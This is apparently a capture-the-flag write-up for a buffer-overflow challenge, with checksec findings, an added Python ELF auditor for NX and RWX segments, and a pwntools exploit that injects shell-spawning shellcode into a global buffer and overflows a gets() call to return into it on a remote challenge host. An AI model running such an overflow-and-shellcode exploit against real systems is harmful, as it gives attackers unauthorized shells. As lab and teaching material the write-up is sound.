0x1 checksec
No protections are enabled and the binary has writable segments, so shellcode is an option.
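As an added example (not part of the original write-up), the script below checks the two properties the checksec result above relies on: whether any PT_LOAD segment is both writable and executable, and whether the stack is marked executable through PT_GNU_STACK. With NX on, data written into a buffer cannot be executed, which is exactly what makes the shellcode approach work here. The ELF image it inspects is constructed inline for the demonstration and is not the challenge binary; `parse_phdrs`, `audit` and `build_sample_elf` are names chosen for this example.

```python
# Added example, not from the original write-up: a minimal ELF64 program-header
# audit covering the part of checksec that matters for a shellcode exploit.
# The sample ELF image built below is constructed for the demo, not the real binary.
import struct

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def parse_phdrs(data):
    """Return (p_type, p_flags, p_vaddr, p_memsz) for each program header of a
    little-endian ELF64 image. Raises ValueError for anything else."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    e_phoff = struct.unpack_from("<Q", data, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    out = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
        p_type, p_flags, _off, p_vaddr, _paddr, _filesz, p_memsz, _align = \
            struct.unpack_from("<IIQQQQQQ", data, off)
        out.append((p_type, p_flags, p_vaddr, p_memsz))
    return out


def rwx_segments(phdrs):
    """PT_LOAD segments that are writable and executable at the same time;
    a buffer inside one of these can hold code that will run."""
    return [(vaddr, memsz) for t, flags, vaddr, memsz in phdrs
            if t == PT_LOAD and flags & PF_W and flags & PF_X]


def nx_enabled(phdrs):
    """NX is on when PT_GNU_STACK exists without PF_X. If the header is
    missing the loader falls back to an executable stack, so report NX off."""
    for t, flags, _vaddr, _memsz in phdrs:
        if t == PT_GNU_STACK:
            return not (flags & PF_X)
    return False


def audit(data):
    """Summarise the checksec-style findings for one ELF image."""
    phdrs = parse_phdrs(data)
    return {"nx": nx_enabled(phdrs), "rwx_segments": rwx_segments(phdrs)}


def build_sample_elf(load_flags, stack_flags):
    """Constructed ELF64 image (header + one PT_LOAD + one PT_GNU_STACK) used
    only to exercise the audit; the addresses are illustrative."""
    phdrs = [
        (PT_LOAD, load_flags, 0, 0x601000, 0x601000, 0x100, 0x1000, 0x1000),
        (PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10),
    ]
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, LE, v1
    ehdr = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2, 0x3E, 1, 0x400000,   # e_type EXEC, e_machine x86-64, version, entry
        64, 0, 0,               # e_phoff, e_shoff, e_flags
        64, 56, len(phdrs),     # e_ehsize, e_phentsize, e_phnum
        64, 0, 0)               # e_shentsize, e_shnum, e_shstrndx
    body = b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs)
    return ehdr + body


if __name__ == "__main__":
    weak = build_sample_elf(PF_R | PF_W | PF_X, PF_R | PF_W | PF_X)
    hardened = build_sample_elf(PF_R | PF_W, PF_R | PF_W)
    print("weak    :", audit(weak))      # NX off, one RWX segment
    print("hardened:", audit(hardened))  # NX on, no RWX segments
```

The same `audit` function can be pointed at a real file with `audit(open(path, "rb").read())`; a binary where it reports `nx: True` and an empty `rwx_segments` list would not allow the shellcode-in-`name` technique used in this write-up.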
0x2 IDA
1. main
The gets() call is the overflow point.
Offset
Overflow the stack to return into the shellcode and get a shell.
0x3 EXP
from pwn import *

context.log_level = "debug"
context.arch = "amd64"           # must be set before asm() so shellcraft emits x86-64 code
p = remote("node4.buuoj.cn", 29553)

# shellcode is stored in the global `name` buffer, which lives in a writable, executable segment
shellcode = asm(shellcraft.sh())
name = 0x601080

p.recvuntil(b"name\n")
p.sendline(shellcode)
p.recvuntil(b"?\n")
# 0x28 bytes of padding up to the saved return address, then return into `name`
# (bytes, not str: "A" * 0x28 + p64(...) raises TypeError on Python 3)
payload = b"A" * 0x28 + p64(name)
p.sendline(payload)
p.interactive()